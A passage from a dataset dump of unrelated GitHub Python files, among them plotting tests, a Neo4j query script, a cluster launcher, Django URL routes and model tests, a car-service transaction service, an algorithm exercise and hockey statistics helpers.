[content, [str_y, str_ym, str_yw, str_ymd, str_ymdh]]\n","repo_name":"kldavis4/access_log_analyzer","sub_path":"lib/access_log_analyzer/parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":1992,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"40542236111","text":"#!/usr/bin/env python3\nimport jutil as ju\nimport matplotlib\nmatplotlib.use('TkAgg')\nimport matplotlib.pyplot as plt\nimport numpy as np\nplt.ion()\n\n\n#x=np.linspace(-1, 1, num=1e5, endpoint=True, dtype=np.float)\n#N1=1\n#N2=150\n#fg, ((ax1))=plt.subplots(nrows=1,ncols=1)\n#NN=range(N1,1+N2)\n#rg=np.ndarray(N2-N1+1,dtype=np.float)\n#for n in range(N1,1+N2): f,F,df,rg[n-N1]=ju.zero_gradf(x,n)\n#ax1.plot(NN,rg)\n#\n#\n#plt.draw()\n#plt.waitforbuttonpress()\n\n \nx=np.linspace(-2, 2, num=1e4, endpoint=True, dtype=np.float) \nN1=5\nN2=5\nfor n in range(N1,1+N2):\n fg, ((ax1,ax4),(ax2,ax5),(ax3,ax6))=plt.subplots(nrows=3,ncols=2)\n f,F,df=ju.zero_gradf(x,n)\n d=1e-5;\n f1,F1,df1=ju.zero_gradf(x+2*d,n)\n f2,F2,df2=ju.zero_gradf(x+1*d,n)\n f3,F3,df3=ju.zero_gradf(x-1*d,n)\n f4,F4,df4=ju.zero_gradf(x-2*d,n)\n e1=f -(-F1+8*F2-8*F3+F4)/(12*d)\n e2=df-(-f1+8*f2-8*f3+f4)/(12*d)\n ax1.plot(x,df)\n ax2.plot(x,f)\n ax3.plot(x,F)\n ax4.plot(x,e2)\n ax5.plot(x,e1)\n\n\nplt.draw()\nplt.waitforbuttonpress()\n\n","repo_name":"jnm11/ded-buoyancy","sub_path":"test_zero_gradf.py","file_name":"test_zero_gradf.py","file_ext":"py","file_size_in_byte":1014,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"16238183043","text":"import py2neo\r\nfrom datetime import datetime\r\n\r\ndef code():\r\n graph = py2neo.Graph('http://10.176.38.226:7474', username='neo4j', password='abc123')\r\n cypher = \"match p=(n)-[*1..1]-() where id(n)=%s with extract(x in nodes(p) | x) as ns, extract(x in relationships(p) | {start: id(startnode(x)), end: id(endnode(x)), rel: type(x), id: id(x), properties: properties(x)}) as rs, n unwind ns as na unwind rs as ra return collect(DISTINCT na),collect(DISTINCT ra), n\" % (1165702)\r\n # print(cypher)\r\n data = graph.run(cypher).data()\r\n nodes = []\r\n for node in data[0][\"collect(DISTINCT na)\"]:\r\n label = list(node.labels)[0]\r\n node_id = node.identity\r\n complete_node = {\r\n \"labels\": [label],\r\n \"id\": node_id,\r\n \"properties\": dict(node.items()),\r\n \"showName\": node[\"name\"],\r\n }\r\n nodes.append(complete_node)\r\n relationships = []\r\n for rel in data[0][\"collect(DISTINCT ra)\"]:\r\n complete_rel = {\r\n \"startNode\": rel[\"start\"],\r\n \"endNode\": rel[\"end\"],\r\n \"source\": rel[\"start\"],\r\n \"target\": rel[\"end\"],\r\n \"id\": rel[\"id\"],\r\n \"type\": rel[\"rel\"],\r\n \"properties\": rel[\"properties\"],\r\n \"linknum\": \"1\"\r\n }\r\n relationships.append(complete_rel)\r\n ret = {\r\n \"center_id\": data[0][\"n\"].identity,\r\n \"nodes\": nodes,\r\n \"relationships\": relationships\r\n }\r\n print(ret)\r\n\r\n\r\nif __name__ == '__main__':\r\n print(datetime.now())\r\n","repo_name":"super100pig/YelpProject","sub_path":"backend/backend/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1543,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"3394393373","text":"import argparse\nimport subprocess\nfrom distutils.util import strtobool\nfrom multiprocessing import Pool\n\nimport pai.pouw.nodes.decentralized.worker\n\n\ndef main():\n # Parse CLI arguments\n parser = argparse.ArgumentParser(description='Starting up POUW cluster')\n parser.add_argument('--cuda', action='store_true', default=False,\n help='Train on GPU with CUDA')\n parser.add_argument('--nodes-number', type=int, default=3,\n help='number of nodes in cluster')\n parser.add_argument('--debug', type=strtobool, default=False,\n help='provide more verbose logging messages')\n parser.add_argument('--redis-host', type=str, default='localhost',\n help='redis host address used for worker synchronization')\n parser.add_argument('--redis-port', type=int, default=6379,\n help='Redis port used for connecting to redis database')\n parser.add_argument('--use-paicoin', type=strtobool, default=True,\n help='enable/disable usage of paicoin for testing and debugging purposes')\n\n args = parser.parse_args()\n\n worker_args = [(args.debug, args.cuda, args.use_paicoin,\n args.redis_host, args.redis_port)\n for _ in range(args.nodes_number)]\n\n pool = Pool(processes=args.nodes_number)\n pool.map(call_wrapper, worker_args)\n\n\ndef call_wrapper(args):\n return call_worker(*args)\n\n\ndef call_worker(is_debug=False, cuda=False, use_paicoin=True, redis_host='localhost', redis_port=6379):\n worker_script_path = pai.pouw.nodes.decentralized.worker.__file__\n # in order to ensure debugger is working properly\n if worker_script_path.endswith('pyc'):\n worker_script_path = worker_script_path[:-1]\n\n script_parameters = ['python3', worker_script_path,\n '--redis-host', redis_host,\n '--redis-port', str(redis_port),\n '--use-paicoin', str(use_paicoin),\n '--cuda', str(cuda),\n ]\n if is_debug:\n script_parameters.append('--debug')\n script_parameters.append('True')\n\n subprocess.call(\n script_parameters\n )\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"skaisahni/tps-optimization-on-blockchain-using-artificial-intelligence","sub_path":"pai/pouw/start_cluster.py","file_name":"start_cluster.py","file_ext":"py","file_size_in_byte":2284,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"43682480248","text":"# -*- coding: utf-8 -*-\n# ==========================================\n# @Time : 2018/3/26 下午9:39\n# @Author : Mr.Robot\n# @File : urls.py\n# ==========================================\nfrom django.urls import re_path\nfrom orgnization.views import OrgView, OrgHomeView, OrgCourseView, OrgDescView, OrgTeacherView, AddFavView\n\nurlpatterns = [\n # 课程机构列表页\n re_path(r'^list/$', OrgView.as_view(), name=\"org_list\"),\n # re_path(r'^add_ask/$', AddUserAskView.as_view(), name=\"add_ask\"),\n re_path(r'^home/(?P\\d+)/$', OrgHomeView.as_view(), name=\"org_home\"),\n re_path(r'^course/(?P\\d+)/$', OrgCourseView.as_view(), name=\"org_course\"),\n re_path(r'^desc/(?P\\d+)/$', OrgDescView.as_view(), name=\"org_desc\"),\n re_path(r'^teacher/(?P\\d+)/$', OrgTeacherView.as_view(), name=\"org_teacher\"),\n\n # 机构收藏\n re_path(r'^add_fav/$', AddFavView.as_view(), name=\"add_fav\"),\n]\n\napp_name = 'org'\n","repo_name":"My-captain/iMooc","sub_path":"apps/orgnization/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":953,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"3"} +{"seq_id":"36031732973","text":"import os\nfrom unittest import TestCase\nimport datetime\nfrom forex import convert\n\nfrom models import db, User, Client, Project, LogEntry\n\nos.environ['DATABASE_URL'] = \"postgresql:///work_logger\"\n\nfrom app import app\n\ndb.create_all()\n\n\nclass LogEntryModelTestCase(TestCase):\n \"\"\"Test views for log entry.\"\"\"\n\n def setUp(self):\n \"\"\"Create test client, add sample data.\"\"\"\n\n db.drop_all()\n db.create_all()\n\n u1 = User.register(\"testuser\", \"testpassword\", \"test@email.com\", \"John\", \"Doe\")\n u1_id = 1111\n u1.id = u1_id\n\n db.session.add(u1)\n db.session.commit()\n\n c1 = Client(user_id=1111, name='Organisation', street='Street 10', postcode='EH2 3XI', country='United Kingdom', city='Edinburgh')\n c1_id = 2222\n c1.id = c1_id\n\n db.session.add(c1)\n db.session.commit()\n\n p1 = Project(user_id=u1_id, project_name='Administration', hourly_rate=100, curr_of_rate='USD', curr_of_inv='EUR', client_id=c1_id)\n p1_id = 3333\n p1.id = p1_id\n\n db.session.add(p1)\n db.session.commit()\n\n le1 = LogEntry(project_id=p1_id, start_time=datetime.datetime(2020, 12, 16, 17, 00, 00), stop_time=datetime.datetime(2020, 12, 16, 18, 00, 00), description='Admin')\n le1_id = 4444 \n le1.id = le1_id\n\n db.session.add(le1)\n db.session.commit()\n\n u1 = User.query.get(u1_id)\n c1 = Client.query.get(c1_id)\n p1 = Project.query.get(p1_id)\n le1 = LogEntry.query.get(le1_id)\n\n self.u1 = u1\n self.u1_id = u1_id\n self.c1 = c1 \n self.c1_id = c1_id\n self.p1 = p1 \n self.p1_id = p1_id\n self.le1 = le1 \n self.le1_id = le1_id\n\n self.client = app.test_client()\n\n def tearDown(self):\n res = super().tearDown()\n db.session.rollback()\n return res\n\n def test_invoice_model(self):\n \"\"\"Does basic model work?\"\"\"\n\n self.assertEqual(self.le1.project_id, self.p1_id)\n\n#######################test log entry methods\n\n def test_pretty_start_time(self): \n \"\"\"does le return pretty start time?\"\"\"\n\n self.assertEqual(self.le1.pretty_start_time, \"17:00\")\n\n def test_pretty_stop_time(self): \n \"\"\"does le return pretty stop time?\"\"\"\n\n self.assertEqual(self.le1.pretty_stop_time, \"18:00\")\n\n def test_pretty_date(self): \n \"\"\"does le return pretty date?\"\"\"\n\n self.assertEqual(self.le1.pretty_date, \"2020-12-16\")\n\n def test_time_delta(self): \n \"\"\"does le return correct time difference?\"\"\"\n\n self.assertEqual(self.le1.time_delta, 60)\n\n def test_calc_value(self): \n \"\"\"does le calculate correct values?\"\"\"\n\n value_inv = round(convert(self.p1.curr_of_rate, self.p1.curr_of_inv, 100), 2)\n\n self.assertEqual(self.le1.calc_value(), {\n \"value_rate\": \n {\"sum\": 100, \"symbol\": \"US$\"}, \n \"value_inv\": \n {\"sum\": value_inv, \"symbol\": \"€\"}\n })\n\n self.assertEqual(self.le1.value_in_curr_of_inv, value_inv)\n self.assertEqual(self.le1.value_in_curr_of_rate, 100)\n\n def test_handle_edit(self): \n \"\"\"does le update correctly?\"\"\"\n\n self.le1.calc_value()\n self.p1.increment_subtotal(self.le1.value_in_curr_of_rate)\n self.p1.increment_converted_subtotal(self.le1.value_in_curr_of_inv)\n\n data = {'description': 'Edited description', \n 'start_time': '17:00', \n 'stop_time': '19:00', \n 'date': '2020-12-01'}\n\n self.le1.handle_edit(data)\n\n self.assertEqual(self.le1.description, 'Edited description')\n self.assertEqual(self.le1.date, datetime.date(2020, 12, 1))\n self.assertEqual(self.le1.start_time, datetime.datetime(2020, 12, 1, 17, 0, 0))\n self.assertEqual(self.le1.stop_time, datetime.datetime(2020, 12, 1, 19, 0, 0))\n\n\n\n\n\n\n\n\n","repo_name":"sanspanic/Track","sub_path":"tests/models/test_log_entry_model.py","file_name":"test_log_entry_model.py","file_ext":"py","file_size_in_byte":3923,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"30606016261","text":"# 숫자 입력 함수\ndef inputNumber(prompt):\n # 입력 변수\n inp = \"\"\n # 변수가 유효한 숫자일 때까지 반복하기\n while not inp.isnumeric():\n # 입력 프롬프트\n inp = input(prompt).strip()\n # 숫자 반환하기\n return int(inp)\n\n# 숫자 가져오기\nnum = inputNumber(\"숫자 입력: \")\n# 출력하기\nprint(num)","repo_name":"yonghun16/Study","sub_path":"BackEnd/do_it_game_python/11/Func4.py","file_name":"Func4.py","file_ext":"py","file_size_in_byte":368,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"28923085171","text":"from Domain.tranzactie import Tranzactie\nfrom Repository.file_repository import FileRepository\nfrom ViewModels.tranzactie_view_models import TranzactieViewModel\n\n\nclass TranzactieService:\n def __init__(self, tranzactii_repository: FileRepository, masini_repository: FileRepository, clienti_repository: FileRepository):\n self.__tranzactii_repository = tranzactii_repository\n self.__masini_repository = masini_repository\n self.__clienti_repository = clienti_repository\n\n def get_all(self):\n view_models = []\n for tranzactie in self.__tranzactii_repository.get_all():\n masina = self.__masini_repository.get_by_id(tranzactie.id_masina)\n client = self.__clienti_repository.get_by_id(tranzactie.id_card_client)\n view_models.append(TranzactieViewModel(tranzactie.id_entitate, masina, client, tranzactie.suma_piese, tranzactie.suma_manopera, tranzactie.data, tranzactie.ora))\n\n return view_models\n\n def adaugare(self, id_tranzactie, id_masina, id_card_client, suma_piese, suma_manopera, data, ora):\n tranzactie = Tranzactie(id_tranzactie, id_masina, id_card_client, suma_piese, suma_manopera, data, ora)\n\n if self.__masini_repository.get_by_id(id_masina) is None:\n raise KeyError('Nu se poate realiza tranzactia pentru ca nu exista o masina cu id-ul ', id_masina)\n if self.__clienti_repository.get_by_id(id_card_client) is None:\n raise KeyError('Nu se poate realiza tranzactia pentru ca nu exista un client cu id-ul ', id_card_client)\n if self.__clienti_repository.get_by_id(id_card_client) is not None:\n tranzactie.suma_manopera_noua = tranzactie.suma_manopera - tranzactie.suma_manopera//10\n\n self.__tranzactii_repository.adaugare(tranzactie)\n\n def stergere(self, id_card_client):\n self.__tranzactii_repository.stergere(id_card_client)\n\n def modificare(self, id_tranzactie, id_masina, id_card_client, suma_piese, suma_manopera, data, ora):\n tranzactie = self.__tranzactii_repository.get_by_id(id_tranzactie)\n if tranzactie is None:\n raise KeyError(f\"Nu exista nicio tranzactie cu id-ul {id_tranzactie}\")\n\n if id_masina != '':\n if self.__masini_repository.get_by_id(id_masina) is None:\n raise KeyError('Nu se poate crea comanda, pt. ca nu exista o masina cu id-ul ', id_masina)\n tranzactie.id_masina = id_masina\n if id_card_client != '':\n if self.__clienti_repository.get_by_id(id_card_client) is None:\n raise KeyError('Nu se poate realiza tranzactie pentru ca nu exista un client cu id-ul ', id_card_client)\n tranzactie.id_client = id_card_client\n if suma_piese != '':\n tranzactie.suma_piese = suma_piese\n if suma_manopera != 0:\n tranzactie.suma_manopera = suma_manopera\n if id_card_client != '':\n tranzactie.suma_manopera_noua = tranzactie.suma_manopera - tranzactie.suma_manopera // 10\n if data != 0:\n tranzactie.data = data\n if ora != '':\n tranzactie.ora = ora\n\n self.__tranzactii_repository.modificare(tranzactie)\n\n def merge(self, array, left_index, right_index, middle, comparison_function):\n left_copy = array[left_index:middle + 1]\n right_copy = array[middle + 1:right_index + 1]\n left_copy_index = 0\n right_copy_index = 0\n sorted_index = left_index\n\n while left_copy_index < len(left_copy) and right_copy_index < len(right_copy):\n if comparison_function(left_copy[left_copy_index], right_copy[right_copy_index]):\n array[sorted_index] = left_copy[left_copy_index]\n left_copy_index = left_copy_index + 1\n else:\n array[sorted_index] = right_copy[right_copy_index]\n right_copy_index = right_copy_index + 1\n\n sorted_index = sorted_index + 1\n\n while left_copy_index < len(left_copy):\n array[sorted_index] = left_copy[left_copy_index]\n left_copy_index = left_copy_index + 1\n sorted_index = sorted_index + 1\n\n while right_copy_index < len(right_copy):\n array[sorted_index] = right_copy[right_copy_index]\n right_copy_index = right_copy_index + 1\n sorted_index = sorted_index + 1\n\n def merge_sort(self, array, left_index, right_index, comparison_function):\n if left_index >= right_index:\n return\n\n middle = (left_index + right_index) // 2\n self.merge_sort(array, left_index, middle, comparison_function)\n self.merge_sort(array, middle + 1, right_index, comparison_function)\n self.merge(array, left_index, right_index, middle, comparison_function)\n","repo_name":"simonadaariana/lab-AlgorithmsAndProgramming","sub_path":"Service/tranzactie_service.py","file_name":"tranzactie_service.py","file_ext":"py","file_size_in_byte":4790,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"7419405312","text":"from django.urls import path\nfrom django.conf import settings\nfrom django.conf.urls.static import static\nfrom . import views\n\nurlpatterns = [\n path('', views.index, name='index'),\n path('about', views.about, name='about'),\n path('courses', views.courses, name='courses'),\n path('courses/', views.course_detail, name='course_detail'),\n path('courses//add_video', views.add_video, name='add_video'),\n path('courses//edit_course', views.edit_course, name='edit_course'),\n path('courses/create', views.course_create, name='course_create'),\n path('profile/', views.profile, name='profile'),\n path('user_login', views.user_login, name='user_login'),\n path('logout', views.user_logout, name='logout'),\n path('special', views.special, name='special'),\n path('charge/', views.checkout, name='charge')\n]\n\nif settings.DEBUG:\n urlpatterns += static(\n settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)\n\n\n","repo_name":"krdowns/learnify","sub_path":"learnify/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":989,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"74379373842","text":"from typing import List\n\n\ndef jump_game_2(nums: List[int]) -> int:\n \"\"\"\n You are given a 0-indexed array of integers nums of length n. You are initially positioned at nums[0].\n\n Each element nums[i] represents the maximum length of a forward jump from index i.\n In other words, if you are at nums[i], you can jump to any nums[i + j] where:\n\n 0 <= j <= nums[i] and\n i + j < n\n\n Return the minimum number of jumps to reach nums[n - 1].\n The test cases are generated such that you can reach nums[n - 1].\n\n Args:\n nums: 0-indexed array of integers of length n\n\n Returns:\n the minimum number of jumps to reach nums[n-1]\n \"\"\"\n jumps, left, right = 0, 0, 0\n\n while right < len(nums) - 1:\n window_end = 0\n for idx in range(left, right + 1):\n window_end = max(window_end, idx + nums[idx])\n left = right + 1\n right = window_end\n jumps += 1\n\n return jumps\n\n\nif __name__ == \"__main__\":\n print(jump_game_2([2, 3, 1, 1, 4]))\n print(jump_game_2([2, 3, 0, 1, 4]))\n","repo_name":"BhupiSindhwani/python-problem-solving","sub_path":"greedy/jump_game_2.py","file_name":"jump_game_2.py","file_ext":"py","file_size_in_byte":1064,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"19039218171","text":"# -*- coding: utf-8 -*-\n\"\"\" helper functions \"\"\"\nimport logging\n# pylint: disable=E0401, C0413\nimport sys\nimport calendar\nimport pathlib\nimport json\nimport configparser\nfrom datetime import datetime, date\nimport math\nimport numpy as np\nfrom dateutil.parser import parse\nimport pytz\nimport os\nimport random\n\nsys.path.insert(0, '.')\nsys.path.insert(1, '..')\n\n\ndef age_calculate(birthdate):\n \"\"\" calculate age \"\"\"\n today = date.today()\n age = today.year - birthdate.year - ((today.month, today.day) < (birthdate.month, birthdate.day))\n return age\n\ndef config_load(logger=None, mfilter=None, cfg_file='hockeygraphs.cfg'):\n \"\"\" small configparser wrappter to load a config file \"\"\"\n if logger:\n logger.debug('config_load({1}:{0})'.format(mfilter, cfg_file))\n config = configparser.RawConfigParser()\n config.optionxform = str\n config.read(cfg_file)\n return config\n\ndef json_load(file_name):\n \"\"\" load json structure from file \"\"\"\n with open(file_name, encoding='utf8') as json_file:\n data = json.load(json_file)\n return data\n\ndef json_store(file_name_, data_):\n \"\"\" store structure as json to file \"\"\"\n with open(file_name_, 'w', encoding='utf-8') as out_file:\n json.dump(data_, out_file, ensure_ascii=False, indent=4)\n\ndef url_build(environ, include_path=False):\n \"\"\" get url \"\"\"\n if 'HTTP_HOST' in environ:\n server_name = environ['HTTP_HOST']\n else:\n server_name = 'localhost'\n\n if 'SERVER_PORT' in environ:\n port = environ['SERVER_PORT']\n else:\n port = 80\n\n if 'HTTP_X_FORWARDED_PROTO' in environ:\n proto = environ['HTTP_X_FORWARDED_PROTO']\n elif 'wsgi.url_scheme' in environ:\n proto = environ['wsgi.url_scheme']\n elif port == 443:\n proto = 'https'\n else:\n proto = 'http'\n\n if include_path and 'PATH_INFO' in environ:\n result = '{0}://{1}{2}'.format(proto, server_name, environ['PATH_INFO'])\n else:\n result = '{0}://{1}'.format(proto, server_name)\n return result\n\ndef testdata_load(_debug=False):\n \"\"\" load testdata for unittests \"\"\"\n # pylint: disable=C0415\n from rest.models import Match, Player, Periodevent, Shift, Season, Shot, Team\n Season.objects.create(name=\"Season-1\")\n Season.objects.create(name=\"Season-2\")\n Team.objects.create(team_id=1, team_name=\"Team-1\", shortcut=\"T1\")\n Team.objects.create(team_id=2, team_name=\"Team-2\", shortcut=\"T2\")\n Match.objects.create(match_id=1, season_id=1, date=\"2020-12-01\", date_uts=1606807800, home_team_id=1, visitor_team_id=2, result='2:1')\n Match.objects.create(match_id=2, season_id=1, date=\"2020-12-02\", date_uts=1606894200, home_team_id=2, visitor_team_id=1, result='1:2')\n Player.objects.create(player_id=1, first_name=\"first_name_1\", last_name=\"last_name_1\", jersey=1)\n Player.objects.create(player_id=2, first_name=\"first_name_2\", last_name=\"last_name_2\", jersey=2)\n Periodevent.objects.create(match_id=1, period_event={'foo': 'bar1'})\n Periodevent.objects.create(match_id=2, period_event={'foo': 'bar2'})\n Shift.objects.create(match_id=1, shift={'foo': 'bar1'})\n Shift.objects.create(match_id=2, shift={'foo': 'bar2'})\n Shot.objects.create(shot_id=11, player_id=1, team_id=1, match_id=1, match_shot_resutl_id=1, timestamp=11, coordinate_x=11, coordinate_y=11, real_date='real_date_11', polygon='polygon_11', zone='zone_11')\n Shot.objects.create(shot_id=12, player_id=1, team_id=1, match_id=1, match_shot_resutl_id=2, timestamp=12, coordinate_x=12, coordinate_y=12, real_date='real_date_12', polygon='polygon_12', zone='zone_12')\n Shot.objects.create(shot_id=13, player_id=1, team_id=1, match_id=1, match_shot_resutl_id=3, timestamp=13, coordinate_x=13, coordinate_y=13, real_date='real_date_13', polygon='polygon_13', zone='zone_13')\n Shot.objects.create(shot_id=14, player_id=1, team_id=1, match_id=1, match_shot_resutl_id=4, timestamp=14, coordinate_x=14, coordinate_y=14, real_date='real_date_14', polygon='polygon_14', zone='zone_14')\n Shot.objects.create(shot_id=21, player_id=2, team_id=2, match_id=1, match_shot_resutl_id=1, timestamp=21, coordinate_x=21, coordinate_y=21, real_date='real_date_21', polygon='polygon_21', zone='zone_21')\n Shot.objects.create(shot_id=22, player_id=2, team_id=2, match_id=1, match_shot_resutl_id=2, timestamp=22, coordinate_x=22, coordinate_y=22, real_date='real_date_22', polygon='polygon_22', zone='zone_22')\n Shot.objects.create(shot_id=23, player_id=2, team_id=2, match_id=1, match_shot_resutl_id=3, timestamp=23, coordinate_x=23, coordinate_y=23, real_date='real_date_23', polygon='polygon_23', zone='zone_23')\n Shot.objects.create(shot_id=24, player_id=2, team_id=2, match_id=1, match_shot_resutl_id=4, timestamp=24, coordinate_x=24, coordinate_y=24, real_date='real_date_24', polygon='polygon_24', zone='zone_24')\n\ndef mobile_check(logger, request):\n \"\"\" mobile check \"\"\"\n logger.debug('mobile_check()')\n if hasattr(request, 'GET') and 'mobile' in request.GET:\n if request.GET['mobile'].lower() == 'true':\n mobile = True\n else:\n mobile = False\n else:\n mobile = False\n logger.debug('mobile_check() ended with: {0}'.format(mobile))\n return mobile\n\ndef logger_setup(debug):\n \"\"\" setup logger \"\"\"\n if debug:\n log_mode = logging.DEBUG\n else:\n log_mode = logging.INFO\n\n # log_formet = '%(message)s'\n log_format = '%(asctime)s - hockey_graphs - %(levelname)s - %(message)s'\n logging.basicConfig(\n format=log_format,\n datefmt=\"%Y-%m-%d %H:%M:%S\",\n level=log_mode)\n logger = logging.getLogger('hockey_graph')\n return logger\n\ndef uts_now():\n \"\"\" return unixtimestamp in utc \"\"\"\n return calendar.timegm(datetime.utcnow().utctimetuple())\n\ndef uts_to_date_utc(uts, tformat='%Y-%m-%dT%H:%M:%SZ', tz='UTC'):\n \"\"\" convert unix timestamp to date format \"\"\"\n return datetime.fromtimestamp(int(uts), tz=pytz.timezone(tz)).strftime(tformat)\n\ndef date_to_uts_utc(date_human, _tformat='%Y-%m-%dT%H:%M:%S'):\n \"\"\" convert date to unix timestamp \"\"\"\n if isinstance(date_human, datetime):\n # we already got an datetime object as input\n result = calendar.timegm(date_human.timetuple())\n else:\n result = int(calendar.timegm(parse(date_human).timetuple()))\n return result\n\ndef date_to_datestr(date, tformat='%Y-%m-%dT%H:%M:%SZ'):\n \"\"\" convert dateobj to datestring \"\"\"\n try:\n result = date.strftime(tformat)\n except BaseException:\n result = None\n return result\n\ndef datestr_to_date(datestr, tformat='%Y-%m-%dT%H:%M:%S'):\n \"\"\" convert datestr to dateobj \"\"\"\n try:\n result = datetime.strptime(datestr, tformat)\n except BaseException:\n result = None\n return result\n\ndef list2dic(_logger, input_list, pkey=None):\n \"\"\" convert a list to a dicitionary \"\"\"\n # logger.debug('list2dic({0})'.format(pkey))\n output_dict = {}\n if pkey:\n for ele in input_list:\n output_dict[ele[pkey]] = ele\n return output_dict\n\ndef maxval_get(input_list, sorter='timestamp', divisor=60, add=1):\n \"\"\" look for a matchvalue form a sorted list \"\"\"\n try:\n x_max = math.ceil(sorted(input_list, key=lambda x: x[sorter])[-1][sorter]/divisor) + add\n except BaseException:\n x_max = divisor + 1\n return x_max\n\ndef pctg_float_get(part, base, decimal=2):\n \"\"\" calculate pcts and return float \"\"\"\n try:\n if base != 0:\n pctg_value = round(part*100/base, decimal)\n else:\n pctg_value = 0\n except BaseException:\n pctg_value = 0\n\n return pctg_value\n\ndef pctg_get(part, base):\n \"\"\" calculate percentage value and return ans string \"\"\"\n # catch division by zero exceptions\n try:\n if base != 0:\n pctg_value = '{0}%'.format(round(part*100/base, 0))\n else:\n pctg_value = '0%'\n except BaseException:\n pctg_value = '0%'\n\n return pctg_value\n\ndef min2sec(sec_value):\n \"\"\" convert seconds to mm:ss \"\"\"\n try:\n (min_, sec) = divmod(sec_value, 60)\n min_value = '{:02d}:{:02d}'.format(min_, sec)\n except BaseException:\n min_value = None\n\n return min_value\n\ndef list_sumup(logger, input_list, filter_values, reverse=False):\n \"\"\" sum up list of dictionaries based on input \"\"\"\n logger.debug('list_sumup()')\n\n match_list = []\n _tmp_sum = {}\n for ele in filter_values:\n _tmp_sum[ele] = 0\n\n if reverse:\n input_list = list(reversed(input_list))\n\n for match in input_list:\n _tmp_dic = {}\n for ele in filter_values:\n _tmp_dic[ele] = match[ele]\n _tmp_sum[ele] += match[ele]\n _tmp_dic['sum_{0}'.format(ele)] = _tmp_sum[ele]\n\n match_list.append(_tmp_dic)\n\n if reverse:\n match_list = list(reversed(match_list))\n\n return match_list\n\ndef shot_leaffan_sync(shot, ltime, ldate):\n \"\"\" keep shot sync with leaffan.net \"\"\"\n #(mday, _time) = shot['real_date'].split(' ', 2)\n #if ltime <= shot['timestamp']:\n # # usually seonds in match should always increase.. if not - this is a mistake and hould be skippt\n # ltime = shot['timestamp']\n # ldate = mday\n # process_shot = True\n #elif abs(ltime - shot['timestamp']) < 300:\n # # consider in game corrections\n # process_shot = True\n # # ldate = mday\n #elif ldate == mday:\n # # consider corrections on same date but outside of match\n process_shot = True\n #else:\n # process_shot = False\n\n return (process_shot, ltime, ldate)\n\ndef deviation_avg_get(logger, input_list, value_list=None):\n \"\"\" add standard deviation \"\"\"\n logger.debug('_deviation_add()')\n _tmp_lake = {}\n for value in value_list:\n _tmp_lake[value] = []\n\n # compile lists\n for ele in input_list:\n for value in value_list:\n if value in ele:\n _tmp_lake[value].append(ele[value])\n\n # calculate deviation\n deviation_dic = {}\n for value in _tmp_lake:\n if _tmp_lake[value]:\n deviation_dic[value] = {'std_deviation': float(round(np.std(_tmp_lake[value]), 2)), 'average': float(round(np.mean(_tmp_lake[value]), 2)), 'min': float(np.amin(_tmp_lake[value])), 'max': float(np.amax(_tmp_lake[value]))}\n\n return deviation_dic\n\ndef highlowabs_get(logger, input_list):\n \"\"\" get highest and lowest value from list \"\"\"\n\n (min_, max_) = highlow_get(logger, input_list)\n absval = 0\n if abs(min_) <= abs(max_):\n absval = abs(max_)\n else:\n absval = abs(min_)\n return absval\n\ndef highlow_get(logger, input_list):\n \"\"\" get highest and lowest value from list \"\"\"\n\n try:\n min_ = min(input_list)\n max_ = max(input_list)\n except BaseException:\n # cornercase handling for list of dictionaires (eg. highchart series)\n min_ = 0\n max_ = 0\n for ele in input_list:\n # process integers\n if isinstance(ele, int):\n if ele < min_:\n min_ = ele\n if ele > max_:\n max_ = ele\n # process dictionaries (highchart series)\n elif isinstance(ele, dict):\n for parameter in ['x', 'y']:\n if parameter in ele:\n if ele[parameter] < min_:\n min_ = ele[parameter]\n if ele[parameter] > max_:\n max_ = ele[parameter]\n return (min_, max_)\n\ndef minmax_get(minval, maxval, average):\n \"\"\" define min/max based on avarage \"\"\"\n\n minabs = round(abs(maxval - average), 0)\n maxabs = round(abs(minval - average), 0)\n\n if maxabs > minabs:\n newmin = average - maxabs\n newmax = average + maxabs\n else:\n newmin = average - minabs\n newmax = average + minabs\n\n return (newmin, newmax)\n\ndef language_get(logger, request):\n \"\"\" lang check \"\"\"\n logger.debug('language_get()')\n\n if hasattr(request, 'GET') and 'language' in request.GET:\n try:\n language = request.GET['language'].lower()\n except BaseException:\n language = 'en'\n else:\n language = 'en'\n\n logger.debug('language_get() ended with: {0}'.format(language))\n return language\n\ndef period_get(value, vtype='min'):\n \"\"\" get period from value \"\"\"\n if vtype == 'min':\n if value <= 20:\n period = 1\n elif value <= 40:\n period = 2\n elif value <= 60:\n period = 3\n else:\n period = 4\n elif vtype == 'sec':\n period = math.ceil(value/1200)\n\n return period\n\ndef sliding_window(logger, in_list, size=5):\n \"\"\" implement forward and backward sliding window for a list of elements \"\"\"\n logger.debug('sliding_window()')\n\n backward_list = []\n forward_list = []\n for idx, current in enumerate(range(len(in_list)), start=0-size):\n # print(idx, current)\n if idx < 0:\n idx = 0\n backward_list.append(in_list[idx:current+1])\n forward_list.append(in_list[current:current+size])\n\n return (backward_list, forward_list)\n\ndef path_check_create(logger, path):\n \"\"\" check save path - create if does not exist \"\"\"\n logger.debug('path_check({0})'.format(path))\n pathlib.Path(path).mkdir(parents=True, exist_ok=True)\n\ndef periodseconds_get(logger, period, tst_end):\n \"\"\" get start/end value for a period \"\"\"\n logger.debug('periodseconds_get({0})'.format(period))\n\n if period == 5:\n start_val = 0\n end_val = tst_end\n elif period == 